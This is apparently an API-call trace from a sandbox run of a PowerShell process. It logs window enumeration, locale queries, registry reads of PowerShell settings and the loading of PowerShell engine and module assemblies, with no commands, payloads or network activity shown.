	[0386.445] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xb54
	[0386.446] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xb5c
	[0386.446] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x838
	[0386.446] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x818
	[0386.446] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x5b8
	[0386.446] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x494
	[0386.446] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x1ec
	[0386.446] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x440
	[0386.446] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x7e8
	[0386.446] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x730
	[0386.446] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x2c8
	[0386.446] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x31c
	[0386.446] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x330
	[0386.447] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x128
	[0386.447] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x5c8
	[0386.447] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x6f8
	[0386.447] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x358
	[0386.447] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x73c
	[0386.447] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xb0
	[0386.447] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x250
	[0386.447] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x240
	[0386.447] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x790
	[0386.447] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x61c
	[0386.447] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x568
	[0386.447] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x538
	[0386.448] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x540
	[0386.448] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x460
	[0386.448] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x79c
	[0386.448] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x4e0
	[0386.448] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x460
	[0386.448] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x778
	[0386.451] WerSetFlags () returned 0x0
	[0386.458] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0386.458] CoTaskMemFree (pv=0x0) 
	[0386.459] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x20df08, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x20df00 | out: pulNumLanguages=0x20df08, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x20df00) returned 1
	[0386.459] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x20df08, pwszLanguagesBuffer=0x2ca4520, pcchLanguagesBuffer=0x20df00 | out: pulNumLanguages=0x20df08, pwszLanguagesBuffer=0x2ca4520, pcchLanguagesBuffer=0x20df00) returned 1
	[0386.464] CoTaskMemAlloc (cb=0x24) returned 0x34bb40
	[0386.464] GetUserDefaultLocaleName (in: lpLocaleName=0x34bb40, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0386.464] CoTaskMemFree (pv=0x34bb40) 
	[0386.924] CoTaskMemAlloc (cb=0x104) returned 0x2e5b10
	[0386.924] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e5b10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0386.924] CoTaskMemFree (pv=0x2e5b10) 
	[0386.926] CoTaskMemAlloc (cb=0x104) returned 0x2e5b10
	[0386.926] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e5b10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0386.926] CoTaskMemFree (pv=0x2e5b10) 
	[0386.928] CoTaskMemAlloc (cb=0x104) returned 0x2e5b10
	[0386.928] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e5b10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0386.928] CoTaskMemFree (pv=0x2e5b10) 
	[0386.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0386.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0386.938] SetErrorMode (uMode=0x1) returned 0x1
	[0386.938] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x20db80 | out: lpFileInformation=0x20db80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0386.938] SetErrorMode (uMode=0x1) returned 0x1
	[0386.938] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x20ddf0 | out: lpdwHandle=0x20ddf0) returned 0x94c
	[0386.939] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2ca7db0 | out: lpData=0x2ca7db0) returned 1
	[0386.940] VerQueryValueW (in: pBlock=0x2ca7db0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x20dd68, puLen=0x20dd60 | out: lplpBuffer=0x20dd68*=0x2ca7e4c, puLen=0x20dd60) returned 1
	[0386.940] VerQueryValueW (in: pBlock=0x2ca7db0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x20dcd8, puLen=0x20dcd0 | out: lplpBuffer=0x20dcd8*=0x2ca7f28, puLen=0x20dcd0) returned 1
	[0386.940] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0386.940] CoTaskMemAlloc (cb=0x2e) returned 0x34df90
	[0386.940] lstrcpyW (in: lpString1=0x34df90, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0386.940] CoTaskMemFree (pv=0x34df90) 
	[0386.940] VerQueryValueW (in: pBlock=0x2ca7db0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x20dcd8, puLen=0x20dcd0 | out: lplpBuffer=0x20dcd8*=0x2ca7f7c, puLen=0x20dcd0) returned 1
	[0386.940] lstrlenW (lpString="System.Management.Automation") returned 28
	[0386.940] CoTaskMemAlloc (cb=0x3c) returned 0x355d70
	[0386.940] lstrcpyW (in: lpString1=0x355d70, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0386.940] CoTaskMemFree (pv=0x355d70) 
	[0386.940] VerQueryValueW (in: pBlock=0x2ca7db0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x20dcd8, puLen=0x20dcd0 | out: lplpBuffer=0x20dcd8*=0x2ca7fd8, puLen=0x20dcd0) returned 1
	[0386.940] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0386.941] CoTaskMemAlloc (cb=0x20) returned 0x352a70
	[0386.941] lstrcpyW (in: lpString1=0x352a70, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0386.941] CoTaskMemFree (pv=0x352a70) 
	[0386.941] VerQueryValueW (in: pBlock=0x2ca7db0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x20dcd8, puLen=0x20dcd0 | out: lplpBuffer=0x20dcd8*=0x2ca8018, puLen=0x20dcd0) returned 1
	[0386.941] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0386.941] CoTaskMemAlloc (cb=0x44) returned 0x355d70
	[0386.941] lstrcpyW (in: lpString1=0x355d70, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0386.941] CoTaskMemFree (pv=0x355d70) 
	[0386.941] VerQueryValueW (in: pBlock=0x2ca7db0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x20dcd8, puLen=0x20dcd0 | out: lplpBuffer=0x20dcd8*=0x2ca8080, puLen=0x20dcd0) returned 1
	[0386.941] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0386.941] CoTaskMemAlloc (cb=0x76) returned 0x2f4ad0
	[0386.941] lstrcpyW (in: lpString1=0x2f4ad0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0386.941] CoTaskMemFree (pv=0x2f4ad0) 
	[0386.941] VerQueryValueW (in: pBlock=0x2ca7db0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x20dcd8, puLen=0x20dcd0 | out: lplpBuffer=0x20dcd8*=0x2ca811c, puLen=0x20dcd0) returned 1
	[0386.941] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0386.941] CoTaskMemAlloc (cb=0x44) returned 0x355d70
	[0386.941] lstrcpyW (in: lpString1=0x355d70, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0386.941] CoTaskMemFree (pv=0x355d70) 
	[0386.941] VerQueryValueW (in: pBlock=0x2ca7db0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x20dcd8, puLen=0x20dcd0 | out: lplpBuffer=0x20dcd8*=0x2ca8180, puLen=0x20dcd0) returned 1
	[0386.941] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0386.941] CoTaskMemAlloc (cb=0x58) returned 0x2a5120
	[0386.941] lstrcpyW (in: lpString1=0x2a5120, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0386.941] CoTaskMemFree (pv=0x2a5120) 
	[0386.941] VerQueryValueW (in: pBlock=0x2ca7db0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x20dcd8, puLen=0x20dcd0 | out: lplpBuffer=0x20dcd8*=0x2ca81fc, puLen=0x20dcd0) returned 1
	[0386.941] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0386.941] CoTaskMemAlloc (cb=0x20) returned 0x352a70
	[0386.941] lstrcpyW (in: lpString1=0x352a70, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0386.941] CoTaskMemFree (pv=0x352a70) 
	[0386.941] VerQueryValueW (in: pBlock=0x2ca7db0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x20dcd8, puLen=0x20dcd0 | out: lplpBuffer=0x20dcd8*=0x2ca7ea4, puLen=0x20dcd0) returned 1
	[0386.941] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0386.942] CoTaskMemAlloc (cb=0x66) returned 0x351ca0
	[0386.942] lstrcpyW (in: lpString1=0x351ca0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0386.942] CoTaskMemFree (pv=0x351ca0) 
	[0386.942] VerQueryValueW (in: pBlock=0x2ca7db0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x20dcd8, puLen=0x20dcd0 | out: lplpBuffer=0x20dcd8*=0x0, puLen=0x20dcd0) returned 0
	[0386.942] VerQueryValueW (in: pBlock=0x2ca7db0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x20dcd8, puLen=0x20dcd0 | out: lplpBuffer=0x20dcd8*=0x0, puLen=0x20dcd0) returned 0
	[0386.942] VerQueryValueW (in: pBlock=0x2ca7db0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x20dcd8, puLen=0x20dcd0 | out: lplpBuffer=0x20dcd8*=0x0, puLen=0x20dcd0) returned 0
	[0386.942] VerQueryValueW (in: pBlock=0x2ca7db0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x20dca8, puLen=0x20dca0 | out: lplpBuffer=0x20dca8*=0x2ca7e4c, puLen=0x20dca0) returned 1
	[0386.942] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0386.942] VerLanguageNameW (in: wLang=0x0, szLang=0x2ec760, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0386.942] CoTaskMemFree (pv=0x2ec760) 
	[0386.942] VerQueryValueW (in: pBlock=0x2ca7db0, lpSubBlock="\\", lplpBuffer=0x20dcf8, puLen=0x20dcf0 | out: lplpBuffer=0x20dcf8*=0x2ca7dd8, puLen=0x20dcf0) returned 1
	[0387.274] CoTaskMemAlloc (cb=0x104) returned 0x2e5b10
	[0387.274] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e5b10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0387.275] CoTaskMemFree (pv=0x2e5b10) 
	[0387.279] CoTaskMemAlloc (cb=0x104) returned 0x2e5b10
	[0387.279] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e5b10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0387.279] CoTaskMemFree (pv=0x2e5b10) 
	[0387.284] lstrlenW (lpString="䅁") returned 1
	[0387.293] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20dbc8 | out: phkResult=0x20dbc8*=0x2fc) returned 0x0
	[0387.294] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x20dbb8 | out: phkResult=0x20dbb8*=0x300) returned 0x0
	[0387.294] RegOpenKeyExW (in: hKey=0x300, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20dc48 | out: phkResult=0x20dc48*=0x304) returned 0x0
	[0387.298] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20db8c, lpData=0x0, lpcbData=0x20db88*=0x0 | out: lpType=0x20db8c*=0x1, lpData=0x0, lpcbData=0x20db88*=0x56) returned 0x0
	[0387.299] CoTaskMemAlloc (cb=0x5a) returned 0x351c30
	[0387.299] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20db5c, lpData=0x351c30, lpcbData=0x20db58*=0x56 | out: lpType=0x20db5c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20db58*=0x56) returned 0x0
	[0387.299] CoTaskMemFree (pv=0x351c30) 
	[0387.314] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0387.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0387.619] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0387.633] CoTaskMemAlloc (cb=0x104) returned 0x2e5b10
	[0387.633] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e5b10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0387.633] CoTaskMemFree (pv=0x2e5b10) 
	[0389.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x20d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0389.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x20d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0390.692] CoTaskMemAlloc (cb=0x104) returned 0x35e360
	[0390.692] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x35e360, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0390.692] CoTaskMemFree (pv=0x35e360) 
	[0390.693] CoTaskMemAlloc (cb=0x104) returned 0x35e360
	[0390.694] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x35e360, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0390.694] CoTaskMemFree (pv=0x35e360) 
	[0391.254] CoTaskMemAlloc (cb=0x104) returned 0x35f490
	[0391.254] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x35f490, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0391.254] CoTaskMemFree (pv=0x35f490) 
	[0391.256] CoTaskMemAlloc (cb=0x104) returned 0x35f490
	[0391.256] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x35f490, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0391.256] CoTaskMemFree (pv=0x35f490) 
	[0391.256] CoTaskMemAlloc (cb=0x104) returned 0x35f490
	[0391.256] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x35f490, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0391.256] CoTaskMemFree (pv=0x35f490) 
	[0392.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x20d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0392.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x20d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0392.861] CoTaskMemAlloc (cb=0x104) returned 0x354880
	[0392.861] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x354880, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0392.862] CoTaskMemFree (pv=0x354880) 
	[0392.865] CoTaskMemAlloc (cb=0x104) returned 0x354880
	[0392.865] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x354880, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0392.865] CoTaskMemFree (pv=0x354880) 
	[0393.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0393.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x20d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0396.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x20d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0396.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0396.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0397.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x20d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0397.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x20d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0398.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x20d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0398.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x20d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0398.759] CoTaskMemAlloc (cb=0x104) returned 0x2b9d20
	[0398.759] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b9d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0398.759] CoTaskMemFree (pv=0x2b9d20) 
